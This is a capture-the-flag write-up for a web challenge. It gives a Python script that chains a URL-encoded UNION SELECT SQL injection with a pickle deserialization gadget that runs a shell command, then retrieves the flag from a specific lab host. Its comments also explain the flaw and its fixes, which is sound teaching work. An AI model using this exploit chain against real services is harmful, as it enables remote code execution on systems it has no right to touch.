COP
NOTE

Description: The C.O.P (Cult of Pickles) have started up a new web store to sell their merch. We believe that the funds are being used to carry out illicit pickle-based propaganda operations! Investigate the site and try to find a way into their operation!

Solution:

import pickle
import base64
import os
import requests

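# Command the pickle gadget hands to os.system when the object is
# deserialized; it copies the flag into the directory served under /static/.
payload = 'cp flag.txt application/static/achux21.txt'


class RCE:
    """Pickle gadget whose deserialization calls ``os.system(payload)``.

    ``pickle`` rebuilds an object by calling the callable returned from
    ``__reduce__`` with the accompanying argument tuple, so merely loading
    this object runs a shell command. That is the reason ``pickle.loads``
    must never be applied to data an outside party can influence; a
    data-only format such as JSON has no equivalent hook.
    """

    def __reduce__(self):
        # (callable, args) is invoked by the unpickler, not by pickle.dumps().
        return os.system, (payload,)


# Everything that serializes or talks to the network lives under the guard:
# previously the requests ran at module level and read ``var``, which only
# exists when the file is executed directly, so an import raised NameError.
if __name__ == '__main__':
    # Serialize the gadget and encode it as URL-safe base64 so it survives
    # being placed in a URL path segment.
    var = base64.urlsafe_b64encode(pickle.dumps(RCE())).decode('ascii')

    # %27%20UNION%20SELECT%27 is the URL-encoded form of: ' UNION SELECT'
    # The injected UNION makes the query return the attacker-chosen string
    # in place of a stored row.
    # NOTE(review): presumably the /view/ handler builds its SQL by string
    # concatenation and then base64-decodes and unpickles the selected
    # value - confirm against the application source. Both halves need
    # fixing: bind the id as a query parameter, and store items as plain
    # columns or JSON instead of pickles. A quote followed by UNION SELECT
    # in a request path is also a straightforward pattern to alert on in
    # web server logs.
    requests.get(f"http://167.99.82.136:30931/view/%27%20UNION%20SELECT%27{var}", timeout=10)

    # Retrieve the file the command copied into the static directory.
    flag = requests.get("http://167.99.82.136:30931/static/achux21.txt", timeout=10)

    # Print the result (flag)
    print(flag.text)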

Bye

image